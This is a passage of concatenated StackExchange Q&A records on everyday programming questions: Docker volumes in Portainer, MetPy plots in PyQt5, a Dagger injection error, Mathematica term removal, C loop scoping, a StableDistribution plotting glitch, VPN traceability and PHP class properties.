You'll just have total control upon it, including the ability to update dependencies.\n","meta":{"source":"stackoverflow","title":"How to update Jest testing framework in create-react-app?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Portainer - how to add local path to a volume in docker compose\n\nQuestion: I'm trying to do a basic configuration with Portainer but I can't get my volumes to connect properly. I'm trying a relatively simple configuration as you can see but I get an error when I try this:\n<code>version: '3'\n\nnetworks:\n frontend:\n backend:\n \nservices:\n app:\n image: webdevops\/apache:alpine\n container_name: app\n volumes:\n - \"\/my\/host\/absolute\/path\/data: \/var\/www\"\n networks:\n - frontend\n php:\n image: php:fpm-alpine\n container_name: php\n networks:\n - backend\n db:\n image: mariadb\n container_name: db\n volumes:\n - \"\/my\/host\/absolute\/path\/storage: \/var\/lib\/mysql\"\n networks:\n - backend\n<\/code>\nCould you give me a hand to make this configuration work which would make me a good little starting point to learn to setup the rest correctly.\nAll I can find in the documentation is how to link named volumes but I don't see how to link them to a folder on my local computer so I'm not really advanced with this information...\nComment: Are there spaces after the colons in the `volumes:` blocks? Try deleting those; `\/host\/path:\/container\/path` with no whitespace. You also might be able to simplify this setup by removing unnecessary options like `container_name:` and `networks:`.\nAnswer: Use \"\/var\/lib...\"\nYou need to create a volume and after you can access it by using \/var\/lib\/docker\/volumes\/myVolume\/_data\nIf you are on Windows and you use wsl$ go to your file explorer and use this path : \\\\wsl.localhost\\docker-desktop-data\\version-pack-data\\community\\docker\\volumes to find all your existing volumes. You can past every file you want in your volumes and access it in Portainer.\nif you follow this steps, you're exemple should look like:\n<code>version: '3'\n\nnetworks:\n frontend:\n backend:\n\nservices:\n app:\n image: webdevops\/apache:alpine\n container_name: app\n volumes:\n - \"\/var\/lib\/docker\/volumes\/myAppVolume\/_data: \/var\/www\"\n networks:\n - frontend\n php:\n image: php:fpm-alpine\n container_name: php\n networks:\n - backend\n db:\n image: mariadb\n container_name: db\n volumes:\n - \"\/var\/lib\/docker\/volumes\/myStorageVolume\/_data: \/var\/lib\/mysql\"\n networks:\n - backend\n<\/code>\n","meta":{"source":"stackoverflow","title":"Portainer - how to add local path to a volume in docker compose","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to embed MetPy SkewT plot in PyQt5\n\nQuestion: I want to embed a MetPy SkewT diagram in a PyQT5 GUI. 
The following code creates a SkewT diagram:\n<code>import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nimport metpy.calc as mpcalc\nfrom metpy.cbook import get_test_data\nfrom metpy.plots import SkewT\nfrom metpy.units import units\n\n###########################################\n\n# Change default to be better for skew-T\nplt.rcParams['figure.figsize'] = (9, 9)\n\n###########################################\n\n# Upper air data can be obtained using the siphon package, but for this example we will use\n# some of MetPy's sample data.\n\ncol_names = ['pressure', 'height', 'temperature', 'dewpoint', 'direction', 'speed']\n\ndf = pd.read_fwf(get_test_data('jan20_sounding.txt', as_file_obj=False),\n skiprows=5, usecols=[0, 1, 2, 3, 6, 7], names=col_names)\n\n# Drop any rows with all NaN values for T, Td, winds\ndf = df.dropna(subset=('temperature', 'dewpoint', 'direction', 'speed'\n ), how='all').reset_index(drop=True)\n\n###########################################\n# We will pull the data out of the example dataset into individual variables and\n# assign units.\n\np = df['pressure'].values * units.hPa\nT = df['temperature'].values * units.degC\nTd = df['dewpoint'].values * units.degC\nwind_speed = df['speed'].values * units.knots\nwind_dir = df['direction'].values * units.degrees\nu, v = mpcalc.wind_components(wind_speed, wind_dir)\n\n###########################################\n\nskew = SkewT()\n\n# Plot the data using normal plotting functions, in this case using\n# log scaling in Y, as dictated by the typical meteorological plot\nskew.plot(p, T, 'r')\nskew.plot(p, Td, 'g')\n\n# Set spacing interval--Every 50 mb from 1000 to 100 mb\nmy_interval = np.arange(100, 1000, 50) * units('mbar')\n\n# Get indexes of values closest to defined interval\nix = mpcalc.resample_nn_1d(p, my_interval)\n\n# Plot only values nearest to defined interval values\nskew.plot_barbs(p[ix], u[ix], v[ix])\n\n# Add the relevant special lines\nskew.plot_dry_adiabats()\nskew.plot_moist_adiabats()\nskew.plot_mixing_lines()\nskew.ax.set_ylim(1000, 100)\n\n# Show the plot\nplt.show()\n<\/code>\nThe result is similar to the image below:\n\nI have tried different codes for embedding this SkewT diagram in PyQt5 GUI using <code>FigureCanvasQTAgg()<\/code>. 
One of the efforts is as follows:\n<code>from PyQt5 import QtGui, QtCore\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QVBoxLayout\nimport sys\nfrom matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as NavigationToolbar\nfrom matplotlib.figure import Figure\nimport pandas as pd\n\nimport metpy.calc as mpcalc\nfrom metpy.cbook import get_test_data\nfrom metpy.plots import SkewT\nfrom metpy.units import units\n\nclass Window(QMainWindow):\n def __init__(self):\n super().__init__()\n \n widget=QWidget()\n vbox=QVBoxLayout()\n widget.setLayout(vbox)\n \n plot1 = FigureCanvas(Figure(tight_layout=True, linewidth=3))\n ax1 = plot1.figure.subplots()\n\n ###########################################\n\n # Upper air data can be obtained using the siphon package, but for this example we will use\n # some of MetPy's sample data.\n\n col_names = ['pressure', 'height', 'temperature', 'dewpoint', 'direction', 'speed']\n\n df = pd.read_fwf(get_test_data('jan20_sounding.txt', as_file_obj=False),\n skiprows=5, usecols=[0, 1, 2, 3, 6, 7], names=col_names)\n\n # Drop any rows with all NaN values for T, Td, winds\n df = df.dropna(subset=('temperature', 'dewpoint', 'direction', 'speed'\n ), how='all').reset_index(drop=True)\n\n ###########################################\n # We will pull the data out of the example dataset into individual variables and\n # assign units.\n\n p = df['pressure'].values * units.hPa\n T = df['temperature'].values * units.degC\n Td = df['dewpoint'].values * units.degC\n wind_speed = df['speed'].values * units.knots\n wind_dir = df['direction'].values * units.degrees\n u, v = mpcalc.wind_components(wind_speed, wind_dir)\n\n ###########################################\n\n skew = SkewT(ax1)\n\n # Plot the data using normal plotting functions, in this case using\n # log scaling in Y, as dictated by the typical meteorological plot\n skew.plot(p, T, 'r')\n skew.plot(p, Td, 'g')\n skew.plot_barbs(p, u, v)\n\n # Add the relevant special lines\n skew.plot_dry_adiabats()\n skew.plot_moist_adiabats()\n skew.plot_mixing_lines()\n skew.ax.set_ylim(1000, 100)\n\n self.setCentralWidget(widget)\n self.setWindowTitle('Example')\n self.setMinimumSize(1000, 600)\n # self.showMaximized()\n self.show()\n\nApp = QApplication(sys.argv)\nwindow = Window()\nsys.exit(App.exec())\n<\/code>\nBut it gives some errors.\nAnswer: Here's a slightly different approach that doesn't use PyQt5, but does use PySide2 as the Python Qt5 binding:\n<code>from PySide2 import QtWidgets, QtCore\n\nfrom matplotlib.backends.backend_qt5agg import (\n FigureCanvas, NavigationToolbar2QT as NavigationToolbar)\n\nimport metpy.calc as mpcalc\nfrom metpy.plots import SkewT\nfrom metpy.units import pandas_dataframe_to_unit_arrays\nfrom siphon.simplewebservice.wyoming import WyomingUpperAir\n\nclass ApplicationWindow(QtWidgets.QMainWindow):\n def __init__(self):\n super().__init__()\n self._main = QtWidgets.QWidget()\n self.setCentralWidget(self._main)\n mainLayout = QtWidgets.QHBoxLayout(self._main)\n\n self.skew = SkewT()\n self.skew.ax.set_ylim(1050, 100)\n self.skew.ax.set_xlim(-50, 40)\n self.skew.plot_dry_adiabats()\n self.skew.plot_moist_adiabats()\n self.skew.plot_mixing_lines()\n self._temp_line, = self.skew.plot([], [], 'tab:red')\n self._dewp_line, = self.skew.plot([], [], 'tab:blue')\n self._prof_line, = self.skew.plot([], [], 'black')\n\n self._canvas = FigureCanvas(self.skew.ax.figure)\n 
mainLayout.addWidget(self._canvas, stretch=0)\n\n configLayout = QtWidgets.QGridLayout()\n\n updateButton = QtWidgets.QPushButton('Update')\n updateButton.clicked.connect(self._update_data)\n configLayout.addWidget(updateButton, 4, 1)\n configLayout.setRowStretch(3, 1)\n\n configLayout.addWidget(QtWidgets.QLabel('Site:'), 0, 0)\n self._site_select = QtWidgets.QLineEdit('OUN')\n configLayout.addWidget(self._site_select, 0, 1)\n\n configLayout.addWidget(QtWidgets.QLabel('Date:'), 1, 0)\n self._date_select = QtWidgets.QDateTimeEdit(QtCore.QDateTime(2019, 3, 20, 12, 0, 0))\n configLayout.addWidget(self._date_select, 1, 1)\n\n self._parcel_check = QtWidgets.QCheckBox('Surface Parcel')\n self._parcel_check.toggled.connect(self._handle_prof)\n configLayout.addWidget(self._parcel_check, 2, 0)\n\n mainLayout.addLayout(configLayout, stretch=1)\n\n self._update_data()\n self._handle_prof()\n\n @QtCore.Slot()\n def _update_data(self):\n try:\n print(self._date_select.dateTime().toPython(), self._site_select.text())\n self._data = WyomingUpperAir.request_data(self._date_select.dateTime().toPython(),\n self._site_select.text())\n self._data = pandas_dataframe_to_unit_arrays(self._data)\n self._temp_line.set_data(self._data['temperature'].m, self._data['pressure'].m)\n self._dewp_line.set_data(self._data['dewpoint'].m, self._data['pressure'].m)\n self.flush()\n except ValueError as e:\n print(e)\n\n def flush(self):\n self._canvas.draw()\n self._main.repaint()\n\n @QtCore.Slot()\n def _handle_prof(self):\n if self._parcel_check.isChecked():\n prof_press, _, _, prof_temp = mpcalc.parcel_profile_with_lcl(self._data['pressure'],\n self._data['temperature'],\n self._data['dewpoint'])\n self._prof_line.set_data(prof_temp.to('degC').m, prof_press.to('hPa').m)\n else:\n self._prof_line.set_data([], [])\n\n self.flush()\n\nif __name__ == \"__main__\":\n import sys\n\n qapp = QtWidgets.QApplication(sys.argv)\n app = ApplicationWindow()\n app.show()\n qapp.exec_()\n<\/code>\nAnswer: I suggest you to create a separate python file <code>ui.py<\/code> where you set up your <code>PyQt5<\/code> window, with widgets, layout etc. 
I use Qt Designer for this purpose.\nYou should organize your working directory as:\n<code>\u251c\u2500\u2500 workind_directory\n \u251c\u2500\u2500 main.py\n \u2514\u2500\u2500 ui.py\n<\/code>\nA starting point for the <code>ui.py<\/code> file could be:\n<code>from PyQt5 import QtCore, QtGui, QtWidgets\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(600, 600)\n MainWindow.setMinimumSize(QtCore.QSize(600, 600))\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)\n self.gridLayout.setObjectName(\"gridLayout\")\n self.FigureLayout = QtWidgets.QVBoxLayout()\n self.FigureLayout.setObjectName(\"FigureLayout\")\n self.gridLayout.addLayout(self.FigureLayout, 0, 0, 1, 1)\n self.ToolbarLayout = QtWidgets.QVBoxLayout()\n self.ToolbarLayout.setObjectName(\"ToolbarLayout\")\n self.gridLayout.addLayout(self.ToolbarLayout, 1, 0, 1, 1)\n self.plotButton = QtWidgets.QPushButton(self.centralwidget)\n self.plotButton.setObjectName(\"plotButton\")\n self.gridLayout.addWidget(self.plotButton, 2, 0, 1, 1)\n MainWindow.setCentralWidget(self.centralwidget)\n self.plotButton.setText(\"PLOT\")\n<\/code>\nwhere you have a layout for the plot, another layout for the toolbar (if needed) and a button for update the plot.\nThen you can setup your <code>main.py<\/code> file:\n<code>from PyQt5.QtWidgets import QApplication, QMainWindow\nimport sys\nfrom matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as NavigationToolbar\nimport pandas as pd\nimport numpy as np\nimport ui\nimport matplotlib.pyplot as plt\n\nimport metpy.calc as mpcalc\nfrom metpy.cbook import get_test_data\nfrom metpy.plots import SkewT\nfrom metpy.units import units\n\nclass Window(QMainWindow, ui.Ui_MainWindow):\n\n def __init__(self, parent = None):\n\n super(Window, self).__init__(parent)\n self.setupUi(self)\n\n self.plotButton.clicked.connect(self.plotting)\n\n self.Figure = plt.figure()\n self.Canvas = FigureCanvas(self.Figure)\n self.FigureLayout.addWidget(self.Canvas)\n self.Toolbar = NavigationToolbar(self.Canvas, self)\n self.ToolbarLayout.addWidget(self.Toolbar)\n\n def plotting(self):\n\n ###########################################\n\n # Upper air data can be obtained using the siphon package, but for this example we will use\n # some of MetPy's sample data.\n\n col_names = ['pressure', 'height', 'temperature', 'dewpoint', 'direction', 'speed']\n\n df = pd.read_fwf(get_test_data('jan20_sounding.txt', as_file_obj = False),\n skiprows = 5, usecols = [0, 1, 2, 3, 6, 7], names = col_names)\n\n # Drop any rows with all NaN values for T, Td, winds\n df = df.dropna(subset = ('temperature', 'dewpoint', 'direction', 'speed'\n ), how = 'all').reset_index(drop = True)\n\n ###########################################\n # We will pull the data out of the example dataset into individual variables and\n # assign units.\n\n p = df['pressure'].values*units.hPa\n T = df['temperature'].values*units.degC\n Td = df['dewpoint'].values*units.degC\n wind_speed = df['speed'].values*units.knots\n wind_dir = df['direction'].values*units.degrees\n u, v = mpcalc.wind_components(wind_speed, wind_dir)\n\n ###########################################\n\n skew = SkewT(fig = self.Figure)\n\n # Plot the data using normal plotting functions, in this case using\n # log scaling in Y, as 
dictated by the typical meteorological plot\n skew.plot(p, T, 'r')\n skew.plot(p, Td, 'g')\n # skew.plot_barbs(p, u, v)\n\n # Set spacing interval--Every 50 mb from 1000 to 100 mb\n my_interval = np.arange(100, 1000, 50) * units('mbar')\n\n # Get indexes of values closest to defined interval\n ix = mpcalc.resample_nn_1d(p, my_interval)\n\n # Plot only values nearest to defined interval values\n skew.plot_barbs(p[ix], u[ix], v[ix])\n\n # Add the relevant special lines\n skew.plot_dry_adiabats()\n skew.plot_moist_adiabats()\n skew.plot_mixing_lines()\n skew.ax.set_ylim(1000, 100)\n\n plt.draw()\n\nApp = QApplication(sys.argv)\nwindow = Window()\nwindow.show()\nsys.exit(App.exec_())\n<\/code>\nThis <code>main.py<\/code> file inherits layout from <code>ui.py<\/code>. Pay attention to the <code>__init__()<\/code> method, where figure, canvas, toolbar are created and placed in the respective layouts.\nThen there is the <code>plotting()<\/code> method, where you actually draw the plot you want.\nComment: I updated my answer: there was a little bug. I forgot to pass `fig = self.Figure` parameter to `skew = SkewT()`. Now it should work properly\nComment: Thanks for your advice about structured programming. But my point in asking this question is to understand how to embed a MetPy SkewT (not anything else) diagram in a PyQt5 GUI. I have tried your code, but the SkewT diagram does not appear after clicking.\n","meta":{"source":"stackoverflow","title":"How to embed MetPy SkewT plot in PyQt5","dup_signals":{}},"subset":"stackexchange"} +{"text":"No injector was found for fragment dagger 2.11\n\nQuestion: i have an Activity with one fragment. I am trying to inject the fragment but i am getting 'No injector was found for com.tsiro.dogvip.login.signin.SignInFrgmt' exception.\nActivityModule:\n<code>@Module(includes = BaseActivityModule.class)\npublic abstract class LoginActivityModule {\n\n @PerFragment\n @ContributesAndroidInjector(modules = SignInFragmentModule.class)\n abstract SignInFrgmt signInFrgmtInjector();\n\n @Binds\n @PerActivity\n abstract Activity activity(LoginActivity loginActivity);\n}\n<\/code>\nFragmentModule:\n<code>@Module(includes = BaseFragmentModule.class)\npublic abstract class SignInFragmentModule {\n\n@Binds\n@Named(BaseFragmentModule.FRAGMENT)\n@PerFragment\nabstract Fragment fragment(SignInFrgmt signInFrgmt);\n\n}\n<\/code>\nFragment class extends BaseFragment where HasSupportFragmentInjector is implemented.\nBaseFragment:\n<code>public abstract class BaseFragment extends Fragment implements HasSupportFragmentInjector, Lifecycle.View {\n\n@Inject\nDispatchingAndroidInjector<Fragment> fragmentInjector;\npublic abstract Lifecycle.ViewModel getViewModel();\n\n@SuppressWarnings(\"deprecation\")\n@Override\npublic void onAttach(Activity activity) {\n if (Build.VERSION.SDK_INT < Build.VERSION_CODES.M) {\n \/\/ Perform injection here before M, L (API 22) and below because onAttach(Context)\n \/\/ is not yet available at L.\n AndroidSupportInjection.inject(this);\n }\n super.onAttach(activity);\n}\n\n@Override\npublic void onAttach(Context context) {\n if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) {\n \/\/ Perform injection here for M (API 23) due to deprecation of onAttach(Activity).\n AndroidSupportInjection.inject(this);\n }\n super.onAttach(context);\n}\n\n@Override\npublic void onStart() {\n super.onStart();\n getViewModel().onViewAttached(this);\n}\n\n@Override\npublic void onResume() {\n super.onResume();\n getViewModel().onViewResumed();\n}\n\n@Override\npublic void 
onPause() {\n super.onPause();\n}\n\n@Override\npublic void onStop() {\n super.onStop();\n getViewModel().onViewDetached();\n}\n\n@Override\npublic AndroidInjector<Fragment> supportFragmentInjector() {\n return fragmentInjector;\n}\n\n }\n<\/code>\nCan anybody tell me what i am missing?\nComment: When is your fragment injected in the above code?\nAnswer: The problem with your code, is the incorrect implementation of the interface <code>HasSupportFragmentInjector<\/code> or <code>HasFragmentInjector<\/code> (it depends on whether you are using the support library for fragments or not).\nYou should implement this interface either in your Activity that is hosting the fragment, or in your Application class. Personally, I 'd recommend the following Application class so you don't bother implementing it on every Activity that hosts a Fragment:\n<code>public class MyApplication extends Application implements HasActivityInjector, HasSupportFragmentInjector {\n\n @Inject\n DispatchingAndroidInjector<Activity> mActivityInjector;\n\n @Inject\n DispatchingAndroidInjector<Fragment> mFragmentInjector;\n\n @Override\n public void onCreate() {\n super.onCreate();\n\n \/\/The way you build your top-level Application component can vary. This is just an example\n DaggerApplicationComponent.builder()\n .application(this)\n .build()\n .inject(this);\n\n }\n\n @Override\n public AndroidInjector<Activity> activityInjector() {\n return mActivityInjector;\n }\n\n @Override\n public AndroidInjector<Fragment> supportFragmentInjector() {\n return mFragmentInjector;\n }\n}\n<\/code>\nAnd then in you inject your Fragments (as you already do in your code):\n<code>@Override\npublic void onAttach(Context context) {\n AndroidSupportInjection.inject(this);\n super.onAttach(context);\n}\n<\/code>\nIf the above is not working, make sure you have created the appropriate Components\/Subcomponents for the screen you are trying to inject. If you are using <code>@ContributesAndroidInjector<\/code> instead of manually defining components, make sure you have one entry for your screen in your binding Module:\n<code>@ContributesAndroidInjector(modules = MyScreenModule.class)\nabstract MyScreenActivity bindMyScreen();<\/code>\nIf you still can't get it to work. I recommend reading the actual Dagger documentation: \nHope it helps.\nComment: Doesn't work for me, my error message is slightly different: `java.lang.IllegalArgumentException: No injector factory bound for Class<...MyFragment>` . :( I already have `supportFragmentInjector()` in my `Application` subclass\nComment: Don't forget to add `MyApplication ` to AndroidMnifest that was my undoing.\nComment: I'm facing the same problem. 
Hope to get it solved and post the solution soon.\nComment: Don't forget to add `MyApplication ` to AndroidMnifest that was my undoing.\nAnswer: In my case,\nMy <code>Fragment<\/code> already extends <code>DaggerFragment<\/code>.\nHowever, my <code>Activity<\/code> extends <code>AppCompatActivity<\/code> and I got error \n<code>No injector was found for fragment dagger<\/code>\nIt quite strange because the error is mention about <code>Fragment<\/code> and without using fragment, the Activity still work fine\nChange <code>Activity<\/code> extends <code>DaggerAppCompatActivity<\/code> make it work\nComment: This saved my day!\nComment: I got this error: No injector factory bound for Class xxx\nComment: Fixed by adding ActivityModule, refer to this answer please: https:\/\/stackoverflow.com\/a\/45327464\/3260008\nComment: I'm using dagger 2.21\nAnswer: I fixed this bug. First , extend your fragment with DaggerFragment\n<code>class BaseFragment : DaggerFragment(){}\n<\/code>\nAfter, add the onAttach method in the same Fragment :\n<code> override fun onAttach(context: Context?) {\n AndroidSupportInjection.inject(this)\n super.onAttach(context)\n}\n<\/code>\nPS: I'm using Kotlin.\nAnswer: When I use dagger version <code>2.26<\/code> that problem happened, then I change dagger version to <code>2.23.2<\/code> ten it work. Try to use 2.23.2 vesion:\n<code>implementation \"com.google.dagger:dagger-android-support:2.23.2\"\n<\/code>\n","meta":{"source":"stackoverflow","title":"No injector was found for fragment dagger 2.11","dup_signals":{}},"subset":"stackexchange"} +{"text":"Remove a term which includes a defined variable from an equation\n\nQuestion: Is it possible to remove a term which includes a defined variable from an equation?\nmy equation is something like:\n<code>qq := {a*b^2*FIinAlpha31''''[t] + 2*c*d*e*cos (FIinAlpha32[t])}\n<\/code>\nand I want to remove the term which includes <code>FIinAlpha31''''[t]<\/code>, so the result whould be \n<code>+2*c*d*e*cos (FIinAlpha32[t])\n<\/code>\nI tried <code>deleteWith<\/code> and <code>DeleteCases<\/code>, but none of them gave the result I'm after.\nI appreciate any help.\nI can derive the term which includes <code>FIinAlpha31''''[t]<\/code> with <code>Coefficient<\/code> if it's needed\nAnswer: Just:\n<code>qq \/. FIinAlpha31''''[t] -> 0\n<\/code>\nComment: this does not work, when sending equations from matlab, to remove in mathematica.\nAnswer: <code>qq := {a*b^2*FIinAlpha31''''[t] + 2*c*d*e*cos (FIinAlpha32[t])}\n\nqq \/. Derivative[_][_][_] -> 0\n\n(* {3\/2 c cos d FIinAlpha32[t]} *)\n<\/code>\nOr\n<code>Cases[qq, _?(FreeQ[#, Derivative] &), {2}]\n\n(* {3\/2 c cos d FIinAlpha32[t]} *)\n<\/code>\nOr\n<code>DeleteCases[qq, _?(! FreeQ[#, Derivative] &), {2}]\n\n(* {3\/2 c cos d FIinAlpha32[t]} *)\n<\/code>\nComment: I have other derivatives in my equation too, this was the simplest example I have. So I cannot specify if there is derivative remove that.\nComment: You can replace one or more blanks with values to make it as specific as necessary.\n","meta":{"source":"mathematica.stackexchange","title":"Remove a term which includes a defined variable from an equation","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can I combine two for statements into one?\n\nQuestion: This a simpler proof-of-concept for comparing pins on a microcontroller and I am trying to work out the basics of this code before moving to the microcontroller IDE. In this code each element of the array is a pin and the values of the array elements are compared. 
My code achieves what I want it to do, but I am trying to simplify it so It is not multiple print lines and instead counts how many of the pins are the same value and can print what pins are the same and what those same pin values are.\n<code>#include<stdio.h>\n\nint main(){\n \nint count1=0;\n\n\/\/array represents pins, values range from 1 to 8. NOT COUNTING ARRAY ELEMENT 0.\nint arrNew[]={0,1,1,2,6,7,3,4,3,4,5,8};\n\n\/\/FOR LOOPS TO COMPARE EACH PIN TO EACH OTHER.\nfor(int i = 1; i < 12; i++)\nfor(int k = i; k < 12; k++)\n\n\/\/PRINT IF PINS ARE NOT THE SAME\n if(arrNew[i] != arrNew[k]){\n \n printf(\"\\nPin %d is not the same as %d.\", arrNew[i], arrNew[k]);\n }\n}\n<\/code>\nCurrently I am trying to create a counter for each time an array element value is a certain number, but I am getting an error of 'k' not declared in my for statement.\n<code>#include<stdio.h>\n\nint main(){\n \nint count1=0;\n\n\/\/array represents pins, values range from 1 to 8. NOT COUNTING ARRAY ELEMENT 0.\nint arrNew[]={0,1,1,2,6,7,3,4,3,4,5,8};\n\n\/\/FOR LOOPS TO COMPARE EACH PIN TO EACH OTHER.\nfor(int i = 1; i < 12; i++)\nfor(int k = i; k < 12; k++)\n\n\/\/PRINT IF PINS ARE NOT THE SAME\n if(arrNew[i] != arrNew[k]){\n \n printf(\"\\nPin %d is not the same as %d.\", arrNew[i], arrNew[k]);\n }\n \n\/\/keep count of WHAT pins are of the same value, and what VALUE those same pins are. \n if (arrNew[k]=1){\n count1++;\n }\n}\n<\/code>\n<code>21 13 C:\\Users\\xxxx\\Desktop\\dev c\\Untitled1.cpp [Error] 'k' was not declared in this scope\n<\/code>\nWould combining the two FOR statements allow me to access the value of int k as it is updated through the FOR loop in order to keep count of how many array element values are 1, 2, etc..?\nComment: Use `{}` brackets around the bodies of each of your `for` loops. Otherwise it's ambiguous.\nComment: I'm voting to close this question until I see code that is indented in a way that shows OP:s intent.\nComment: Also use indentation to show what you mean (and think) your code does. Currently - your indentation shows that you don't understand what your code does.\nComment: `if (arrNew[k]=1){` ... Do you mean to assign 1 to each element of the array? When you've cleared-up the errors, pay attention to the compiler warmings... BTW, you seem to want to compare two different elements. Either you need two loops, or you'll have to devise some arcane way to have two discrete indices.\nComment: @Iguananaut, I did try this, but when using `{}` around the body of the second `for` loop it does not work properly with the first `for` loop.\nComment: You're _not_ getting full\/correct coverage with your `for` loops. You want: `for (int i = 0; i < (12 - 1); i++) for (int k = i + 1; k < 12; k++)`\nComment: @Fe2O3, Thank you for pointing that out. You are correct.\nComment: @deadlight446 `if( arrNew[ k ] = 1 ) {` Make friends with whitespace to make your code more readable... I quickly scanned that line in your source 2-3 times before spotting the bug... And, as suggested by Iguananaut, use indent and curly braces to show the intent of what's contained within what...\nAnswer: The syntax for <code>for<\/code> is:\n<code>for (...) STMT\n<\/code>\nOnly the statement immediately following the parens is part of the loop. 
This statement could be a simple statement (an expression with a semi-colon), a block (statements in curlies), some flow control statement (like another <code>for<\/code> loop), etc.\nThe important part is that only the first statement after the <code>for<\/code> is part of the loop.\n<code> for (int i = 1; i < 12; i++)\n for (int k = i; k < 12; k++)\n if (arrNew[i] != arrNew[k]) {\n printf(\"\\nPin %d is not the same as %d.\", arrNew[i], arrNew[k]);\n }\n \n if (arrNew[k]=1) { \/\/ <---- Not part of either loop\n count1++;\n }\n<\/code>\nIf you want more than one statement to form the body a loop, you'll need to wrap them in curlies (like you did for the <code>if<\/code> statements).\nNot sure what you were going for, so I'm not sure how to fix it.\n\nNote that you appear to have confused <code>=<\/code> for <code>==<\/code> in the bottom <code>if<\/code>.\nComment: It's the same syntax; a compound statement `{...}` is just one kind of statement that can be used as the body of the `for` loop.\n","meta":{"source":"stackoverflow","title":"Can I combine two for statements into one?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Bug on PDF@StableDistribution when beta is less than -0.995?\n\nQuestion: I see a problem with <code>PDF@StableDistribution<\/code> when beta is less than <code>-0.995<\/code>, Mathematica 10.0 and 11.0 64 bit for Windows, try for example:\n<code>Plot[PDF[StableDistribution[0, 1.88, -0.995, 0., 0.1], x], {x, -6 , -4},PlotRange -> All] \n<\/code>\n\nYou'll see a discontinuity that should not exist, how to fix? Thanks.\nComment: Please do not use bug tag unless it is confirmed by community or WRI Support.\nAnswer: This is just an extended comment. As there is no closed-form formula for a stable distribution (except for certain special combinations of parameters) numerical methods are used to estimate the density. All such algorithms don't always work well in the tail regions.\nTo put your issue in perspective consider extending the plot range to <code>{-6,1}<\/code>:\n<code>Show[\n Plot[PDF[StableDistribution[0, 1.88, -0.995, 0., 0.1], x], {x, -6, 1},\n PlotRange -> All],\n ListPlot[{{-6, 0}, {-4, 0}}, PlotStyle -> Thickness[0.02], \n Joined -> True, PlotRangeClipping -> False]\n]\n<\/code>\n\nThe highlighted portion in the lower left of the figure is the range for your original figure. If you really need great accuracy in the tail regions, you should report this issue directly to Wolfram, Inc.\nAnswer: Another way to look at it is that it has to do with round-off (and possibly underflow, I suppose). This can be addressed by increasing the working precision (and the precision of the parameters):\n<code>Plot[PDF[StableDistribution[0, 1.88`32, -0.995`32, 0, 0.1`32], \n x], {x, -6, -4}, PlotRange -> All, WorkingPrecision -> 32]\n<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"Bug on PDF@StableDistribution when beta is less than -0.995?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Am I traceable if the VPN I am using keeps turning on and off?\n\nQuestion: Let's say Bob is on network A and he decided to use a VPN service. Unfortunately he is using a poor VPN service which keeps turning on and off. But the Active downloads of packets are still ongoing because of the active home network A. \nFor example, a streaming youtube video is not effected by this switching of networks. So is there anywhere this trail is logged? If it's logged, who can trace it? Who has rights to trace it? 
\nComment: Keep in mind that VPN is not designed to ensure anonymity.\nComment: I found this somehow related to it but does not answer my question : https:\/\/security.stackexchange.com\/questions\/72679\/differences-between-using-tor-browser-and-vpn?rq=1\nComment: sure, when I just went through above Q, I come to realize that the whole idea of anonymity through VPN is not complete. I understood that it provide access to different network and IPs.\nAnswer: You are traceable. You used the correct idea when you described it as \"switching networks\". As you are streaming, your computer continually reaches out to the server to get the next bits. Your computer does not care what network it is on, it is just reaching out to the server, and the network and all the hops between you and the server are responsible for getting the traffic there.\nSo, if you start off using a VPN, then the packets travel over the VPN network. If that network goes down, then the network adjusts to keep the stream going on the new non-VPN network. This stream is unprotected in any way.\nAll streams are logged. The VPN provider logs the streams going through it, and the ISP logs the streams going through it. The server also logs the connections made, so it will see that the stream keeps switching networks.\nComment: and so this kind of sessions which are divided over multiple network is more exposing about digital footprint than the sessions which are performed only in single network? Or one (admin of ISP or VPN) can deduct the same footprint in both cases?\nComment: what do you mean by \"footprint\"?\nComment: I mean when the session started , which IP , new IPs of VPN, accessed URL throughout the session and things like this which ISP servers keep sniffing.\n","meta":{"source":"security.stackexchange","title":"Am I traceable if the VPN I am using keeps turning on and off?","dup_signals":{}},"subset":"stackexchange"} +{"text":"variable accesible in php class built in the construtor that references another class?\n\nQuestion: So, in short I'd like my login class to not have to create a new instance of my DB class within in function. Currently I'm trying to do it like this:\n<code><?php\n\nclass siteLogin\n{\n\nprivate $db;\nprivate $dataStore;\n\nfunction __construct()\n{\n if (!isset($_SESSION)) {\n session_start();\n }\n\n require_once '..\/application\/db.php';\n $this->$db = new DB();\n require_once '..\/application\/data.php';\n $this->$dataStore = new Data($db);\n}\n<\/code>\nBut I get the error:\n<code> Fatal error: Cannot access empty property in C:\\var\\www\\sexdiaries.co.uk\\class\\siteLoginClass.php on line 16\n<\/code>\nI would like to give give <code>$this->$db<\/code> the reference to <code>siteLogin<\/code> class.\nAnswer: You're not using the right notation for properties. Try this instead:\n<code>$this->db = new DB();\n$this->dataStore = new Data($db);\n<\/code>\nThey aren't prefixed with <code>$<\/code> like normal variables. 
